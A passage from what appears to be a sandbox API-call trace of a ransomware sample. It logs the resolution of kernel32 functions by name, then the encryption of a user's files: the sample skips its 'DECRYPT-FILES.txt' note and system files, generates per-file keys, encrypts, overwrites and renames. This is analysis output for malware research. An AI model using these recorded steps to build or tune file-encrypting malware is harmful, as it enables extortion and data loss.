returned="CreateWaitableTimerA" [0077.044] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.044] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.044] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.044] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.044] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.044] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.044] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.044] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.044] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.044] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.044] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.044] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.044] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.044] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.044] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.045] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.045] lstrlenA (lpString="DELETEATOM") returned 10 [0077.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.045] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.045] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.045] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.045] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.045] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.045] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.046] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.046] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.046] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.046] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.046] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.046] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.046] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.046] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.046] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.046] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.046] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.046] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.046] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.046] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.046] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.046] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.046] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.046] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.046] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.047] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.047] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.047] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.047] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.047] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.047] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.047] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.047] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.047] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.047] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.047] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.047] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.047] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.047] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.047] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.047] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.048] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf") returned 58 [0077.048] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf.02fm6gn") returned 66 [0077.048] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\d2zhg8js.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf.02fm6gn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\d2zhg8js.swf.02fm6gn"), dwFlags=0x0) returned 1 [0077.048] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.049] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.049] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.049] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d5a6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.049] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.049] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeea172c0, ftCreationTime.dwHighDateTime=0x1d4cb4f, ftLastAccessTime.dwLowDateTime=0xf58c6ba0, ftLastAccessTime.dwHighDateTime=0x1d4c9ae, ftLastWriteTime.dwLowDateTime=0xf58c6ba0, ftLastWriteTime.dwHighDateTime=0x1d4c9ae, nFileSizeHigh=0x0, nFileSizeLow=0xe0d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="DNJ0jH17yLgW1.gif", cAlternateFileName="DNJ0JH~1.GIF")) returned 1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="autorun.inf") returned 1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="boot.ini") returned 1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="desktop.ini") returned 1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="ntuser.dat") returned -1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="iconcache.db") returned -1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="bootsect.bak") returned 1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="ntuser.dat.log") returned -1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="thumbs.db") returned -1 [0077.049] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif", lpString2="Bootfont.bin") returned 1 [0077.049] lstrlenW (lpString="DNJ0jH17yLgW1.gif") returned 17 [0077.049] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0077.049] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0077.049] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0077.049] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0077.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.049] lstrlenW (lpString="DNJ0jH17yLgW1.gif") returned 17 [0077.050] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.050] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="DNJ0jH17yLgW1.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif" [0077.050] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dnj0jh17ylgw1.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.050] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=57553) returned 1 [0077.050] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.050] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.050] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.050] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.050] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.051] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.051] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.052] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.052] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.053] CloseHandle (hObject=0x444) returned 1 [0077.053] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.053] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.054] CloseHandle (hObject=0x0) returned 0 [0077.054] CloseHandle (hObject=0x440) returned 1 [0077.055] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.055] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.055] GetTickCount () returned 0x114bc5d [0077.055] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.055] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.056] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.056] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.056] lstrlenA (lpString="kernel32.dll") returned 12 [0077.056] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.056] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.056] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.056] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.056] lstrlenA (lpString="ADDATOMA") returned 8 [0077.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.056] lstrlenA (lpString="ADDATOMW") returned 8 [0077.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.056] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.057] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.057] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.057] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.057] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.057] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.057] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.057] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.057] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.057] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.057] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.057] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.057] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.057] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.057] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.057] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.057] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.057] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.057] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.058] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.058] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.058] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.058] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.058] lstrlenA 